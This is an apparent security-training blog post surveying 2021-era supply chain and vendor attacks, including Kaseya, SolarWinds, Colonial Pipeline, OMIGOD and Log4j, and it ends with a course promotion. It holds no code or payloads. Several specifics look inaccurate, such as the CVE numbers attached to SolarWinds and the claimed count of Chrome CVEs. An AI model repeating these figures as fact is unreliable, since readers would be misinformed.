By: Owen Dubiel
May 6, 2022
Welcome to the Era of Vendor Supply Chain Pipeline Attacks
By: Owen Dubiel
May 6, 2022
*Common Vulnerabilities and Exposures (CVE) are an industry standard for effectively tagging and identifying vulnerabilities in the wild. In this article, we will plan to cover some of the most devastating CVEs from the past year. More specifically, we will focus on a new trend that threat actors have been targeting: the vendor supply chain. *
A standard attack vector that has recently ramped up in the past year is the vendor supply chain pipeline. We refer to IT and security-based software solutions that are affected, which are widespread across the globe amongst companies of all sizes. These vendor suites have been left vulnerable and are taken advantage of by threat actors to expose a mighty gap and a direct way into some of the most secure networks on the planet.
The defensive landscape has become more heavily reliant on security and IT solutions to adequately protect and triage large networks. As you will see, this has left a significant hole in the exterior defense by allowing actors to compromise these vendors' solutions by injecting themselves into the development pipeline and swapping out legitimate code with their malicious code. The following are some of the most critical supply chain attacks that occurred over this past year.
Popular Supply Chain Attacks:
Kaseya is an IT software management company that fell to threat actor REvil in 2021. REvil exploited an authentication bypass vulnerability in the Kaseya VSA software interface. This vulnerability allows REvil to bypass standard authentication methods and gain access to upload a payload and execution of SQL injection. Ultimately, REvil was able to alter the software update and deploy its ransomware to hundreds of Kaseya customers using the solution. The effects were dramatic, causing over 1000 businesses to temporarily close due to having their critical information encrypted by the attack.
In 2020, FireEye dubbed the discovery of a SolarWinds supply chain attack as Sunburst. It was later assigned to CVE-2020-14005 and CVE-2020-13169. This significant discovery had bleeding effects well into 2021. The attack compromised the SolarWinds patch management engine and slipped their nefarious code into the SolarWinds Orion solution. This took the cyber world by storm. At first, no one was able to identify who was responsible for the breach. Later in the year, credit was given to the nation-state threat group NOBELIUM.
The colonial pipeline breach was one of the largest thus far in US history. Threat group Darkside was able to access the Colonial VPN by compromising a single account that was marked as inactive. Once inside, the threat group had the freedom to move about virtually undetected, allowing them to deploy their ransomware at will. It was believed the account credentials were discovered online, potentially by a former employee who reused the same password elsewhere.
The OMIGOD vulnerability was assigned as CVE-2021-38647; this vulnerability left thousands of Azure Linux VMs open to remote code execution. The flaw was so widespread due to the vulnerability being primarily located with the default OMI agent pushed out by Azure for Linux VMs, covering many Azure components like automation, updates, and even the operations management suite. 38647 was exploited by an unauthenticated, remote user sending specifically crafted packets over the Azure remote management ports (5986, 5985, and 1270), which inevitably provided the attacker with the ability to execute remote code with ease. Since its discovery, additional spinoff CVEs have provided the same level of remote execution ability but achieved slightly differently. These are CVE-2021-38645, CVE-2021-38648, and CVE-2021-38649.
I'm sure everyone is familiar with this one, the infamous Log4J. Dubbed CVE-2021-44228, Log4j allows remote attackers to execute arbitrary code from the LDAP server with the message lookup substitution value enabled. Apache is a common and widely used solution, so when this was discovered, there was a widespread panic to disable the service to avoid imminent compromise. Since then, multiple spinoff vulnerabilities have ultimately derived from that affected version (2.0-2.17). This is not the first time Apache has been the culprit of nationwide breaches. But in the past, it was due to lazy patch efforts, not weekend zero-day drops.
To conclude our list of critical CVEs, it may be no surprise that Google Chrome takes the cake. Chrome reported almost 20,000 CVEs in 2021, with over 2,700 of them being critical. To view a complete list of these CVEs, visit here. One of the most significant supply chain concerns with Google Chrome was that not only were corporations affected, everyone who uses the Chrome browser was affected for days, if not weeks in some cases, for a patch to come out. The scariest part is that most end users are not consciously aware they may have to do manual updates independently. This leaves millions of insecure and vulnerable Chrome browsers open for an attack at any given moment. Resulting in a mad rush for enterprises to test new patches and deploy as soon as possible, as new vulnerabilities are being released weekly, if not daily.
At the end of the day, what do all these vulnerabilities have in common? Supply chain attacks have added complexity to the secure domain conversation and left end users helpless in a state of "sit and wait" for a patch to be released. These vulnerabilities are detrimental to both organizations and individuals as now the responsibility is shared between the vendor and the end user. No longer is it just the end user's responsibility to update their services, but the vendors now have a big task of taking on a more proactive role in security. With the shift to cloud-based solutions, the vendor's responsibility to ensure that both the end user and the supply chain are adequately secured is more prevalent than ever. It will be interesting to see what technologies emerge from this trend to help eliminate or offset the effects of supply chain attacks.
Thousands of CVEs are discovered daily. If you want hands-on practice exploiting and mitigating these CVEs, explore Cybrary’s CVE Series here. These courses let you experience critical vulnerabilities through interactive courses and secure virtual environments to develop the skills necessary to mitigate risk.